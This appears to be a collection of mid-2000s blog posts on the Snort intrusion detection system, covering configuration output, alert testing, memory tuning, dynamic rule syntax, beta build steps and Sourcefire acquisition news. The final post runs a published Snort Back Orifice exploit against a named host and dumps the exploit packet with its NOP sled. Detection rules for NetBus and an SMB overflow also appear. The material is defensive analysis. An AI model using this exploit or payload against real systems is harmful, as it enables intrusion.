    Emergency Ports: 21 23 25 42 53 80 110 111 135 136 137 139 143 445 513 1433 1521 3306 
HttpInspect Config:
    GLOBAL CONFIG
      Max Pipeline Requests:    0
      Inspection Type:          STATELESS
      Detect Proxy Usage:       NO
      IIS Unicode Map Filename: rules/unicode.map
      IIS Unicode Map Codepage: 1252
    DEFAULT SERVER CONFIG:
      Ports: 80 8080 8180 
      Flow Depth: 300
      Max Chunk Length: 500000
      Inspect Pipeline Requests: YES
      URI Discovery Strict Mode: NO
      Allow Proxy Usage: NO
      Disable Alerting: NO
      Oversize Dir Length: 500
      Only inspect URI: NO
      Ascii: YES alert: NO
      Double Decoding: YES alert: YES
      %U Encoding: YES alert: YES
      Bare Byte: YES alert: YES
      Base36: OFF
      UTF 8: OFF
      IIS Unicode: YES alert: YES
      Multiple Slash: YES alert: NO
      IIS Backslash: YES alert: NO
      Directory Traversal: YES alert: NO
      Web Root Traversal: YES alert: YES
      Apache WhiteSpace: YES alert: NO
      IIS Delimiter: YES alert: NO
      IIS Unicode Map: GLOBAL IIS UNICODE MAP CONFIG
      Non-RFC Compliant Characters: NONE
rpc_decode arguments:
    Ports to decode RPC on: 111 32771 
    alert_fragments: INACTIVE
    alert_large_fragments: ACTIVE
    alert_incomplete: ACTIVE
    alert_multiple_requests: ACTIVE
Portscan Detection Config:
    Detect Protocols:  TCP UDP ICMP IP
    Detect Scan Type:  portscan portsweep decoy_portscan distributed_portscan
    Sensitivity Level: Low
    Memcap (in bytes): 10000000
    Number of Nodes:   36900

4655 Snort rules read...
4655 Option Chains linked into 206 Chain Headers
0 Dynamic rules
+++++++++++++++++++++++++++++++++++++++++++++++++++

Tagged Packet Limit: 256

+-----------------------[thresholding-config]----------------------------------
| memory-cap : 1048576 bytes
+-----------------------[thresholding-global]----------------------------------
| none
+-----------------------[thresholding-local]-----------------------------------
| gen-id=1      sig-id=3543       type=Threshold tracking=src count=5   seconds=2  
| gen-id=1      sig-id=3527       type=Limit     tracking=dst count=5   seconds=60 
| gen-id=1      sig-id=3152       type=Threshold tracking=src count=5   seconds=2  
| gen-id=1      sig-id=3273       type=Threshold tracking=src count=5   seconds=2  
| gen-id=1      sig-id=2275       type=Threshold tracking=dst count=5   seconds=60 
| gen-id=1      sig-id=2523       type=Both      tracking=dst count=10  seconds=10 
| gen-id=1      sig-id=3542       type=Threshold tracking=src count=5   seconds=2  
| gen-id=1      sig-id=4984       type=Threshold tracking=src count=5   seconds=2  
| gen-id=1      sig-id=2923       type=Threshold tracking=dst count=10  seconds=60 
| gen-id=1      sig-id=2924       type=Threshold tracking=dst count=10  seconds=60 
+-----------------------[suppression]------------------------------------------
| none
-------------------------------------------------------------------------------
Rule application order: ->activation->dynamic->pass->drop->alert->log
Log directory = /var/log/snort
Loading dynamic engine /usr/local/lib/snort_dynamicengine/libsf_engine.so... done
Loading all dynamic preprocessor libs from /usr/local/lib/snort_dynamicpreprocessor/...
  Loading dynamic preprocessor library 
 /usr/local/lib/snort_dynamicpreprocessor//libsf_ftptelnet_preproc.so... done
  Loading dynamic preprocessor library 
 /usr/local/lib/snort_dynamicpreprocessor//libsf_smtp_preproc.so... done
  Finished Loading all dynamic preprocessor libs from /usr/local/lib/snort_dynamicpreprocessor/
FTPTelnet Config:
    GLOBAL CONFIG
      Inspection Type: stateful
      Check for Encrypted Traffic: YES alert: YES
      Continue to check encrypted data: NO
    TELNET CONFIG:
      Ports: 23 
      Are You There Threshold: 200
      Normalize: YES
    FTP CONFIG:
      FTP Server: default
        Ports: 21 
        Check for Telnet Cmds: YES alert: YES
        Identify open data channels: YES
      FTP Client: default
        Check for Bounce Attacks: YES alert: YES
        Check for Telnet Cmds: YES alert: YES
        Max Response Length: 256
SMTP Config:
      Ports: 25 
      Inspection Type:            STATEFUL
      Normalize Spaces:           YES
      Ignore Data:                NO
      Ignore TLS Data:            NO
      Ignore Alerts:              NO
      Max Command Length:         0
      Max Header Line Length:     0
      Max Response Line Length:   0
      X-Link2State Alert:         YES
      Drop on X-Link2State Alert: NO
Verifying Preprocessor Configurations!
Warning: flowbits key 'realplayer.playlist' is checked but not ever set.
Warning: flowbits key 'ms_sql_seen_dns' is checked but not ever set.
Warning: flowbits key 'dce.isystemactivator.bind.call.attempt' is set but not ever checked.
Warning: flowbits key 'dce.bind.veritas' is set but not ever checked.
Warning: flowbits key 'http.jpeg' is checked but not ever set.
Decoding LoopBack on interface NULL

        --== Initialization Complete ==--

   ,,_     -*> Snort! <*-
  o"  )~   Version 2.6.0 (Build 59)  FreeBSD
   ''''    By Martin Roesch & The Snort Team: http://www.snort.org/team.html
           (C) Copyright 1998-2006 Sourcefire Inc., et al.

           Rules Engine: SF_SNORT_DETECTION_ENGINE  Version 1.5  
           Preprocessor Object: SF_SMTP  Version 1.0  
           Preprocessor Object: SF_FTPTELNET  Version 1.0  

Snort sucessfully loaded all rules and checked all rule chains!
Frag3 statistics:
        Total Fragments: 0
      Frags Reassembled: 0
               Discards: 0
          Memory Faults: 0
               Timeouts: 0
               Overlaps: 0
              Anomalies: 0
                 Alerts: 0
     FragTrackers Added: 0
    FragTrackers Dumped: 0
FragTrackers Auto Freed: 0
    Frag Nodes Inserted: 0
     Frag Nodes Deleted: 0
===============================================================================
Final Flow Statistics
,----[ FLOWCACHE STATS ]----------
Memcap: 10485760 Overhead Bytes 16400 used(%0.156403)/blocks (16400/1)
Overhead blocks: 1 Could Hold: (0)
IPV4 count: 0 frees: 0
low_time: 0, high_time: 0, diff: 0h:00:00s
    finds: 0 reversed: 0(%0.000000) 
    find_success: 0 find_fail: 0
percent_success: (%0.000000) new_flows: 0
Snort exiting

That looked fine as well. At this point I was ready to see if Snort detected a simple activity that it believes is an attack. I always recommend running Snort like this before installing Sguil, BASE, or any other product. Get Snort to work in its simplest mode first -- write pcap data to a snort.log.TIMESTAMP file and alerts to an alert text file.

orr:/usr/local/etc/snort# snort -i ndis0 -c rules/snort.conf -l .

I then connected via netcat to port 22 TCP on a system Snort would see, and typed the string GOBBLES.

orr:/home/richard$ nc -v 192.168.2.12 22
Connection to 192.168.2.12 22 port [tcp/ssh] succeeded!
SSH-2.0-OpenSSH_3.8.1p1 Debian-8.sarge.4
GOBBLES
Protocol mismatch.

Sure enough, Snort provided the following alert.

orr:/usr/local/etc/snort# cat alert 
[**] [1:1812:6] EXPLOIT gobbles SSH exploit attempt [**]
[Classification: Misc Attack] [Priority: 2] 
08/04-10:32:58.288723 192.168.2.5:61827 -> 192.168.2.12:22
TCP TTL:64 TOS:0x0 ID:8266 IpLen:20 DgmLen:60 DF
***AP*** Seq: 0x501CCD3D  Ack: 0x80C794DE  Win: 0x8218  TcpLen: 32
TCP Options (3) => NOP NOP TS: 3931737 3840029448 
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0639][Xref => 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0390][Xref => 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=11031][Xref => 
 http://www.securityfocus.com/bid/5093]

It also logged the offending packet.

orr:/usr/local/etc/snort# tcpdump -n -r snort.log.1154701968 -X
reading from file snort.log.1154701968, link-type EN10MB (Ethernet)
10:32:58.288723 IP 192.168.2.5.61827 > 192.168.2.12.22:
 P 1344064829:1344064837(8) ack 2160563422 win 33304 
        0x0000:  4500 003c 204a 4000 4006 9510 c0a8 0205  E..<.J@.@.......
        0x0010:  c0a8 020c f183 0016 501c cd3d 80c7 94de  ........P..=....
        0x0020:  8018 8218 0b38 0000 0101 080a 003b fe59  .....8.......;.Y
        0x0030:  e4e2 3308 474f 4242 4c45 530a            ..3.GOBBLES.

This verifies Snort is working properly.

While Snort was running I checked its memory usage.

20329 root        1 -58    0   227M   226M bpf      0:05 21.38% snort

227 MB is much greater than my experience with Snort 2.4.x, where around 63 MB was the norm.

73920 sguil        1 -58    0 63772K 63000K bpf     10:26  0.00% snort

Looking in the snort.conf file, I enabled the following option to reduce memory usage.

config detection: search-method lowmem  

When I re-ran Snort, memory usage dropped to about 37 MB.

20334 root        1 -58    0 37480K 36656K bpf      0:02 20.06% snort

Keep in mind that Snort will perform less well when given lower memory. On higher bandwidth links it will drop packets.

For information on how to now tune your Snort installation, I recommend reading my newest article Tuning Snort in the August 2006 Sys Admin magazine.

Read More

Snort Dynamic Rules Preview

On my flights to and from the GFIRST 2006 conference this week, I got a chance to read the manual for Snort 2.6.0RC1. The most obvious addition to Snort 2.6 is the ability to add preprocessors, detection capabilities, and rules as dynamically loadable modules. This feature is activated by running configure with the --enable-dynamicplugin switch. Preprocessors and detection capabilities are more of an issue for Snort developers, since few Snort users code their own features. The advantage of the dynamic engine is that developers can write their own modules without having to patch Snort itself.

Most Snort users customize Snort by writing their own rules. Beginning with Snort 2.6.0RC1, the new C-style rule language is in place. If you read the snort_manual.pdf included with snort-2.6.0RC1.tar.gz, you will see a discussion of the new format starting in section 5.1.5 (Dynamic Rules). Here is an example of a rule in the old format:

alert tcp $HOME_NET 12345:12346 -> $EXTERNAL_NET any  (msg:"BACKDOOR netbus active"; 
flow:from_server,established;  content:"NetBus"; reference:arachnids,401; 
classtype:misc-activity;  sid:109; rev:5;)

Here is an example of the same rule in the new format. You can find this rule, sid109.c, in the /src/snort-2.6.0RC1/src/dynamic-examples/dynamic-rule directory.

It looks like this:

/*
 * sid109.c
 *
 * Copyright (C) 2006 Sourcefire,Inc
 * Steven A. Sturges 
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
 *
 * Description:
 *
 * This file is part of an example of a dynamically loadable rules library.
 *
 * NOTES:
 *
 */

#include "sf_snort_plugin_api.h"
#include "sf_snort_packet.h"
#include "detection_lib_meta.h"

/*
 * C-language example for SID 109
 *
 * alert tcp $HOME_NET 12345:12346 -> $EXTERNAL_NET any  * (msg:"BACKDOOR netbus active"; 
 * flow:from_server,established;  * content:"NetBus"; reference:arachnids,401; 
 * classtype:misc-activity;  * sid:109; rev:5;)
 *
 */

/* flow:established, from_server; */
static FlowFlags sid109flow = 
{
    FLOW_ESTABLISHED|FLOW_TO_CLIENT
};

static RuleOption sid109option1 =
{
    OPTION_TYPE_FLOWFLAGS,
    {
        &sid109flow
    }
};

/* content:"NetBus";  */
static ContentInfo sid109content = 
{
    "NetBus",               /* pattern to search for */
    0,                      /* depth */
    0,                      /* offset */
    CONTENT_BUF_NORMALIZED, /* flags */
    NULL,                   /* holder for boyer/moore info */
    NULL,                   /* holder for byte representation of "NetBus" */
    0,                      /* holder for length of byte representation */
    0                       /* holder of increment length */
};

static RuleOption sid109option2 = 
{
    OPTION_TYPE_CONTENT,
    {
        &sid109content
    }
};

/* references for sid 109 */
static RuleReference sid109ref_arachnids =
{
    "arachnids",    /* Type */
    "401"           /* value */
};

static RuleReference *sid109refs[] =
{
    &sid109ref_arachnids,
    NULL
};

RuleOption *sid109options[] =
{
    &sid109option1,
    &sid109option2,
    NULL
};

Rule sid109 =
{
    /* protocol header, akin to => tcp any any -> any any */
    {
        IPPROTO_TCP,        /* proto */
        HOME_NET,           /* source IP */
        "12345:12346",      /* source port(s) */
        0,                  /* direction, uni-directional */
        EXTERNAL_NET,       /* destination IP */
        ANY_PORT            /* destination port(s) */
    },
    /* metadata */
    { 
        3,                  /* genid -- use 3 to distinguish a C rule */
        109,                /* sigid */
        5,                  /* revision */
        "misc-activity",    /* classification */
        0,                  /* priority */
       "BACKDOOR netbus active",    /* message */
       sid109refs           /* ptr to references */
    },
    sid109options, /* ptr to rule options */
    NULL,                   /* Use internal eval func */
    0,                      /* Holder, not yet initialized, used internally */
    0,                      /* Holder, option count, used internally */
    0,                      /* Holder, no alert used internally for flowbits */
    NULL                    /* Holder, rule data, used internally */
};

For an explanation of this rule, please see the snort_manual.pdf packaged with Snort 2.6.0RC1. It is not yet online.

For a simple rule like sid 109, the new structure looks very "heavy." However, consider a rule like the following, sid 2258:

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"NETBIOS SMB-DS DCERPC Messenger Service
 buffer overflow attempt"; flow:to_server,established;  content:"|FF|SMB%"; depth:5; offset:4;
 nocase; content:"&|00|"; within:2; distance:56;  content:"|5C 00|P|00|I|00|P|00|E|00 5C 00|"; 
 within:12; distance:5; nocase;  content:"|04 00|"; within:2; byte_test:1,>,15,2,relative; 
 byte_jump:4,86,little,align,relative;  byte_jump:4,8,little,align,relative; 
 byte_test:4,>,1024,0,little,relative;  reference:bugtraq,8826; reference:cve,2003-0717; 
 reference:nessus,11888;  reference:nessus,11890; 
 reference:url,www.microsoft.com/technet/security/bulletin/MS03-043.mspx;  
 classtype:attempted-admin; sid:2258; rev:9;)

That rule demonstrates the difficulty of writing more complex rules. The new rules structure should make writing rules like sid 2258 easier.

The sid109.c example shown above, and the material in the snort_manual.pdf packaged with Snort 2.6.0RC1,, may not exactly be what is shipped with Snort 2.6.0 or even Snort 3.0.0. Sourcefire has not determined if it will completely replace the old style rule format in favor of the new format. I expect to see Snort 3.0.0 ship with rules in the new format.

Read More

Check Point Acquisition of Sourcefire Cancelled

According to Sourcefire's press release:

Sourcefire, Inc., the world leader in intrusion prevention, today announced that, with the consent of the US government, Sourcefire and Check Point Software Technologies have opted to withdraw their merger filing with the Committee on Foreign Investment in the United States (CFIUS). Sourcefire will continue to operate as the industry's largest private Intrusion Prevention System (IPS) vendor.

According to Check Point's press release:

The companies have determined that it would be more effective to create a customer focused business partnership. "We've decided to pursue alternative ways for Check Point and Sourcefire to partner in order to bring to market the most comprehensive security solutions," said Gil Shwed, Check Point's CEO.

Check Point and Sourcefire will continue to create and distribute the best security solutions in their respective spaces. They will work together on formulating a partnership strategy moving forward and will keep customers and partners updated as new plans are developed.

Their FAQ says this:

Is the Sourcefire acquisition cancelled?

We can still pursue the acquisition but at this point we will explore other opportunities. We will also focus on running our business and delivering the best solutions for customers.

Wow, it's cancelled -- despite what Check Point says. I thought this deal would go through, albeit with restrictions.

Read More

Snort 2.6 BETA on FreeBSD

This week Sourcefire released Snort 2.4.4 and Snort 2.6 BETA. Because the a ports tree freeze is in effect in preparation for FreeBSD 5.5 and 6.1, the Snort port will not be updated to 2.4.4 soon. If you want to install 2.4.4 using the ports tree, make the following changes to /usr/ports/security/snort/Makefile:

orr:/usr/ports/security/snort$ diff Makefile.orig Makefile
9,10c9,10
< PORTVERSION=  2.4.3
< PORTREVISION= 1
---
> PORTVERSION=  2.4.4
> #PORTREVISION=        1

Make these changes to distinfo:

orr:/usr/ports/security/snort$ diff distinfo.orig distinfo
1,6c1,3
< MD5 (snort-2.4.3.tar.gz) = 5c3c8c69f2459bbe0c1f2057966c88a7
< SHA256 (snort-2.4.3.tar.gz) = 4f3aa911234a9fc4beb5ba9b0fe88f1e3af0fcbfe84d4448415f049b9791bc65
< SIZE (snort-2.4.3.tar.gz) = 2733590
< MD5 (snort-2.4.3.tar.gz.sig) = 680b271bb3fe67bd28d41d5a3886865a
< SHA256 (snort-2.4.3.tar.gz.sig) = a7fa680662124e6f95eb87b88e09a0ec7ae394f6845f4a1eada4626066da12d0
< SIZE (snort-2.4.3.tar.gz.sig) = 65
---
> MD5 (snort-2.4.4.tar.gz) = fe82febd153e121369788b3aaa05d415
> SHA256 (snort-2.4.4.tar.gz) = 9d34822e68d6c5bfd98c41f14bf9185424691824b220d70366c40f0477e9d9a7
> SIZE (snort-2.4.4.tar.gz) = 2825060

You can then build the port with 'make', 'make install', and end up running Snort 2.4.4.:

$ snort -V

   ,,_     -*> Snort! <*-
  o"  )~   Version 2.4.4 (Build 28) 
   ''''    By Martin Roesch & The Snort Team: http://www.snort.org/team.html
           (C) Copyright 1998-2005 Sourcefire Inc., et al.
 NOTE: Snort's default output has changed in version 2.4.1!
       The default logging mode is now PCAP, use "-K ascii" to activate
       the old default logging mode.

To try Snort 2.6 BETA, you'll need to follow these steps. First, you need the devel/automake19, devel/libtool15, and devel/autoconf259 installed.

Now check out the Snort BETA from CVS.

cvs -d:pserver:anonymous@cvs.snort.org:/cvsroot login
cvs -d:pserver:anonymous@cvs.snort.org:/cvsroot co -r SNORT_2_6 snort
cd snort

Make the following changes to autojunk.sh:

orr:/home/richard/snort$ diff autojunk.sh.orig autojunk.sh
3,7c3,7
< libtoolize --automake --copy
< aclocal -I m4
< autoheader
< automake --add-missing --copy
< autoconf
---
> libtoolize15 --automake --copy
> aclocal19 -I m4 -I /usr/local/share/aclocal
> autoheader259
> automake19 --add-missing --copy
> autoconf259

These changes are needed because of the names used by the tools that build Snort, as shown by the following directory listings:

# ls -al /usr/local/bin/libtoolize*                                    
-r-xr-xr-x  1 root  wheel  10784 Feb  6 04:08 /usr/local/bin/libtoolize15
# ls -al /usr/local/bin/aclocal*
-r-xr-xr-x  1 root  wheel  19737 Feb  6 19:47 /usr/local/bin/aclocal19
# ls -al /usr/local/bin/autoheader*
-r-xr-xr-x  1 root  wheel  8141 Feb  6 17:55 /usr/local/bin/autoheader259
# ls -al /usr/local/bin/automake*
-r-xr-xr-x  1 root  wheel  222000 Feb  6 19:47 /usr/local/bin/automake19
# ls -al /usr/local/bin/autoconf*
-r-xr-xr-x  1 root  wheel  7672 Feb  6 17:55 /usr/local/bin/autoconf259

You've got to make one more change, to src/dynamic-plugins/sf_engine/Makefile.am. Change the two instances of 'cp $< $@' to 'cp $? $@' as shown below.

orr:/home/richard/snort/src/dynamic-plugins/sf_engine$ diff Makefile.am.orig Makefile.am
28c28
<       cp $< $@
---
>       cp $? $@
31c31
<       cp $< $@
---
>       cp $? $@

When these changes are made, run 'sh autojunk.sh' from the snort directory. You'll see some errors, but they are not fatal.

orr:/home/richard/snort$ sh autojunk.sh
configure.in:170: warning: underquoted definition of SN_CHECK_DECL
  run info '(automake)Extending aclocal'
  or see http://sources.redhat.com/automake/automake.html#Extending-aclocal
configure.in:203: warning: underquoted definition of SN_CHECK_DECLS
configure.in:303: warning: underquoted definition of FAIL_MESSAGE
/usr/X11R6/share/aclocal/gtk.m4:7: warning: underquoted definition of AM_PATH_GTK
/usr/local/share/aclocal/glib.m4:8: warning: underquoted definition of AM_PATH_GLIB
/usr/local/share/aclocal/audiofile.m4:12: warning: underquoted definition of AM_PATH_AUDIOFILE
/usr/local/share/aclocal/ao.m4:9: warning: underquoted definition of XIPH_PATH_AO
/usr/local/share/aclocal/aalib.m4:12: warning: underquoted definition of AM_PATH_AALIB

After that, run the following:

./configure
make 
make install

Remember you'll probably want to run 'make install' as root.

When done, Snort 2.6 BETA will be installed.

orr:/home/richard/snort$ snort -V

   ,,_     -*> Snort! <*-
  o"  )~   Version 2.6.0 (Build 48)  
   ''''    By Martin Roesch & The Snort Team: http://www.snort.org/team.html
           (C) Copyright 1998-2005 Sourcefire Inc., et al.

Let us know how you find Snort 2.6. Thank you to Steven Sturges from Sourcefire for getting this to work for me!

Read More

Feds Delay Check Point Acquisition of Sourcefire

Based on a friend's tip, I found myself looking for this press release, which reads in part:

Check Point® Software Technologies Ltd. (NASDAQ: CHKP), the world leader in securing the Internet, received notice its pending acquisition of Sourcefire®, Inc. has moved into the investigative stage with the Committee on Foreign Investment in the United States ("CFIUS").

In order to clear the transaction with the United States Government, Check Point submitted two regulatory applications. Check Point received U.S. anti-trust approval and was advised that CFIUS would continue reviewing the application during a 45-day investigative period...

Pursuant to the Exon-Florio legislation, CFIUS reviews proposed foreign acquisitions of U.S. companies in order to protect national security while maintaining the credibility of the United States open investment policy. The Exon-Florio legislation provides for a 30-day review following notification of a potential acquisition. CFIUS has the option to extend the review period for an additional 45-day review (or "investigation").

That press release excerpt sounds fairly tame, but this article is more interesting:

CFIUS has 30 days in which to examine an acquisition. It can extend that period by 45 days for the purposes of investigation. This is exactly what has happened to Check Point. What's more, once the status of an examination becomes "investigative", the acquisition comes under the purview of none other than US President George W. Bush. At the end of the 45 days, CFIUS submits a report to the president, who must announce his decision within 15 days.

All in all then, taking into account the initial 30 day period, the 45 day investigation period, and the 15 days for the presidential decision, it can take 90 days from the initial examination of the application until the president informs Congress whether he chooses to block the deal or not. For Check Point, only the first 30 days have gone by, so that, theoretically, closure of the deal could be put back to the second quarter...

In the case of Check Point and Sourcefire, it is still not clear what the cause pf CFIUS's concern is. It is a fairly rare occurrence for it to choose to investigate such a low-value deal.

Another friend pointed me to this article:

Most foreign U.S. deals are approved after CFIUS completes an informal 30-day probe, but this transaction has raised the eyebrows of some of the panel members, leading to the lengthier examination.

"The fact that they launched a 45-day review means that some serious concerns are being raised," said a national security consultant who formerly worked at the Department of Defense.

Sources said CFIUS representatives from the Department of Defense and the Department of Homeland Security are worried that the deal gives critical computer network security technology to Israel. Sourcefire develops network security and information management systems for Defense Department agencies, in addition to private industry clients.

I'll keep my eye on this. I bet the deal will go through, with the government getting source code access to all Sourcefire products.

Read More

Snort.org Posts BlackWorm Packet Captures

The folks at Sourcefire have done the analyst community a great service by posting traffic captures of CME-24, aka "BlackWorm". Kudos also to the Common Malware Enumeration project for providing an easy way to reference malware! Once OpenPacket.org gets going, I hope to host these sorts of captures there.

Update: Check out this Sourcefire VRT analysis.

Read More

First Hampton Roads, VA Snort Users Group Meeting

My friend David Bianco is organizing a Hampton Roads, VA Snort Users Group. The first meeting will be 1 December 2005. Check out the story for more details!

Read More

Snort BO Exploit Published

As I expected, FrSIRT published an exploit for the Snort Back Orifice vulnerability discovered last week. I was able to compile and execute this code by RD of THC.org on FreeBSD 5.4.

orr:/home/richard$ ./THCsnortbo 66.93.110.10 1
Snort BackOrifice PING exploit (version 0.3)
by rd@thc.org

Selected target:
  1 | manual testing gcc with -O0

Sending exploit to 66.93.110.10
Done.
orr:/home/richard$ ./THCsnortbo 66.93.110.10 2
Snort BackOrifice PING exploit (version 0.3)
by rd@thc.org

Selected target:
  2 | manual testing gcc with -O2

Sending exploit to 66.93.110.10
Done.

Here is what the traffic looks like:

09:30:36.134739 IP 192.168.2.5.56292 > 66.93.110.10.53:  52835 updateD ServFail [5863q][|domain]
        0x0000:  4500 0594 0bdb 0000 4011 f669 c0a8 0205  E.......@..i....
        0x0010:  425d 6e0a dbe4 0035 0580 9592 ce63 d1d2  B]n....5.....c..
        0x0020:  16e7 13cf d45a 5a79 4d8a b466 aaa2 c875  .....ZZyM..f...u
        0x0030:  2309 78b2 e0d4 ef49 8a8e 39e5 aa8a 4d0d  #.x....I..9...M.
        0x0040:  22b5 3751 6ec9 9763 29e3 8469 f317 7430  ".7Qn..c)..i..t0
        0x0050:  f162 20c3 d501 a47b c0a0 c559 a5d5 96b2  .b.....{...Y....
        0x0060:  b04f fc0b 6749 d086 70c3 e65b 93f2 8c0a  .O..gI..p..[....
        0x0070:  0197 140f 95ce 3598 3a88 2fb3 cdbb ae2b  ......5.:./....+
        0x0080:  0458 7135 0f1e 8b06 be6d 2aa8 84bd 56ec  .Xq5.....m*...V.
        0x0090:  da50 3ca1 a785 0b46 be2e bf3c a9a5 dd80  .P<....F...<....
        0x00a0:  855a de98 ed70 cf8c 3cc9 b7f7 8ddf 3b7d  .Z...p..<.....;}
        0x00b0:  0595 ffbf f38d 4e6d 769b 7c1c c159 6a58  ......Nmv.|..YjX
        0x00c0:  3b5c 6a7b 8aa8 43df f0c0 9710 36a0 0306  ;\j{..C.....6...
        0x00d0:  e92e 8752 824e a6b6 4a75 d07a bdc1 9e1c  ...R.N..Ju.z....
        0x00e0:  ce27 bee7 6c6c d148 c458 303d a7a8 d68e  .'..ll.H.X0=....
        0x00f0:  6e43 7a81 5a50 fb69 81a6 e17e c6a3 c293  nCz.ZP.i...~....
        0x0100:  a7e1 a244 3d06 ffce 003a ac84 c95f 1bbf  ...D=....:..._..
        0x0110:  bcbc a1d5 86bb d48d 0374 5852 c349 1b46  .........tXR.I.F
        0x0120:  ad73 deb9 25fc b51a 8a4f b14d 03cd bbfe  .s..%....O.M....
        0x0130:  9c22 a315 eb17 1bab f848 1d1b 3c39 143c  .".......H..<9.<
        0x0140:  e965 5a0e 0a78 bd94 6cde 07a1 feda 7f15  .eZ..x..l.......
        0x0150:  35db aa6a 13ac 966a 096b 98e4 7a9d 94be  5..j...j.k..z...
        0x0160:  6100 7dcd 76e0 dee3 ae4e 78a8 e16e 0c8c  a.}.v....Nx..n..
        0x0170:  6f70 1c5b 2522 ee93 bca4 1132 04fc 4294  op.[%".....2..B.
        0x0180:  3f0a 901b b0fe dfef 76e9 ca89 b472 6d4a  ?.......v....rmJ
        0x0190:  b3ca e2b1 09c1 2a6d bcfa afd0 a2bd 2745  ......*m......'E
        0x01a0:  2b6d dbc3 41d9 6941 6e96 a76d 9fcc 49f8  +m..A.iAn..m..I.
        0x01b0:  880f a4b4 2812 1401 0e17 1be4 dc2a ebd9  ....(........*..
        0x01c0:  8b0f 864b 10f9 8481 1dfc 559b 2b45 67fd  ...K......U.+Eg.
        0x01d0:  7609 8a6b 093b 32f7 1ce2 3df6 fbea 7699  v..k.;2...=...v.
        0x01e0:  49fa 39db 25a6 f877 0c05 ddfc 3f26 b002  I.9.%..w....?&..
        0x01f0:  06be fc5f 55a6 4db6 6d83 7dd0 8645 2f2d  ..._U.M.m.}..E/-
        0x0200:  6dd4 db5c 6988 2c69 a2f8 86d7 e3f5 8cef  m..\i.,i........
        0x0210:  bfd8 e157 5219 6de6 6ac2 02b7 46a3 409d  ...WR.m.j...F.@.
        0x0220:  1d87 d616 42e7 4962 c75d fa55 00dc 234b  ....B.Ib.].U..#K
        0x0230:  295e e29c 8a9e 5a91 1a87 76d5 a26c 4f0f  )^....Z...v..lO.
        0x0240:  035a 7030 5b2b 18e8 833c 1f9e 1d41 3ddf  .Zp0[+...<...A=.
        0x0250:  ad38 2755 c4bb 9cfc 25da bf52 2208 258e  .8'U....%..R".%.
        0x0260:  86d5 f2d2 f9dc 1fa3 ff7d 5ed9 62ce 4112  .........}^.b.A.
        0x0270:  512e 188b 69da 1af2 1343 2656 4ee0 8aa0  Q...i....C&VN...
        0x0280:  8fe0 8406 a602 265d e2e9 ff0e d8ca 788d  ......&]......x.
        0x0290:  c068 bda6 0042 9d19 6d0a 53e8 af7a 46ed  .h...B..m.S..zF.
        0x02a0:  25a3 ad51 2966 577b b5a6 2aa6 85bd 2a57  %..Q)fW{..*...*W
        0x02b0:  7fae 7dad 31bb cd19 ba18 0e90 ccff 203e  ..}.1..........>
        0x02c0:  70e6 b67e ea4e 18a8 1e9d 67a9 74ae 9fb9  p..~.N....g.t...
        0x02d0:  38e8 82c9 252c d29b 8313 1e17 2df8 e1fb  8...%,......-...
        0x02e0:  38b1 88d3 9223 53c9 2776 fd5f aa67 3f7a  8....#S.'v._.g?z
        0x02f0:  121e 7221 c37f 1427 2ee4 4ca5 7bab 71cb  ..r!...'..L.{.q.
        0x0300:  868c c978 484e ae69 383a f58e 312f f223  ...xHN.i8:..1/.#
        0x0310:  16f8 36fe 93bb 7aa4 a5d4 41a1 fdc2 58b7  ..6...z...A...X.
        0x0320:  a1df a196 1455 522e f8af b7c1 306e 7fbc  .....UR.....0n..
        0x0330:  2a7e 3527 dd49 adbb 1049 2334 5b83 7ee7  *~5'.I...I#4[.~.
        0x0340:  9232 7a55 1f42 86c0 6e1f 6b1e 508d 8f6c  .2zU.B..n.k.P..l
        0x0350:  b899 b925 2acf d5d3 358d 5a25 1e78 8b61  ...%*...5.Z%.x.a
        0x0360:  1f6e 5bdc 10fc 94c8 e511 b96d 1712 2a5c  .n[........m..* 
        0x0370:  480f e81f 41b6 5ab5 3e67 f01d ada8 86d0  H...A.Z.>g......
        0x0380:  72d9 8b54 4f6a c2ee 426c 6858 ef06 18d3  r..TOj..BlhX....
        0x0390:  4009 4bfe 8a06 04e8 32de 2bc3 f0fa 389a  @.K.....2.+...8.
        0x03a0:  93fd b3c4 a576 59f9 8f7a 2284 a051 c09a  .....vY..z"..Q..
        0x03b0:  8a70 0aea 8e87 fa75 1a9c b4a0 1078 0968  .p.....u.....x.h
        0x03c0:  68c0 bbb5 9807 a152 f4a2 0d9c b1fc 4c58  h......R......LX
        0x03d0:  2ecb 6d4a f482 8684 fd88 73dc b489 2121  ..mJ......s...!!
        0x03e0:  5b4c eacf 73e5 c2a0 372c 9145 4a6d 62b6  [L..s...7,.EJmb.
        0x03f0:  5261 dc27 e57d ce3c c3ca d05e 44f5 274e  Ra.'.}.<...^D.'N
        0x0400:  1467 cab9 db78 63cc 62e0 b80a 734e cb5c  .g...xc.b...sN.  
        0x0410:  a01c 5ea8 4782 9bc6 d52a 134e 88a4 e5b6  ..^.G....*.N....
        0x0420:  b91b 813b 5ac8 4e7d dca6 c911 55e5 4ff1  ...;Z.N}....U.O.
        0x0430:  9f83 5c16 8477 7529 d9b0 6336 e9aa 8210  ..\..wu)..c6....
        0x0440:  d5ef 789e 77bd 491c 2e92 e890 16bc d51e  ..x.w.I.........
        0x0450:  f8fd 1e58 2446 23ee fa37 8841 3e90 9090  ...X$F#..7.A>...
        0x0460:  9090 9090 9090 9090 9090 9090 9090 9090  ................
        0x0470:  9090 9090 9090 9090 9090 9090 9090 9090  ................
        0x0480:  9090 9090 9090 9090 9090 9090 9090 9090  ................
        0x0490:  9090 9090 9090 9090 9090 9090 9090 9090  ................
        0x04a0:  9090 9090 9090 9090 9090 9090 9090 9090  ................
        0x04b0:  9090 9090 9090 9090 9090 9090 9090 9090  ................
        0x04c0:  9090 9090 9090 9090 9090 9090 9090 9090  ................
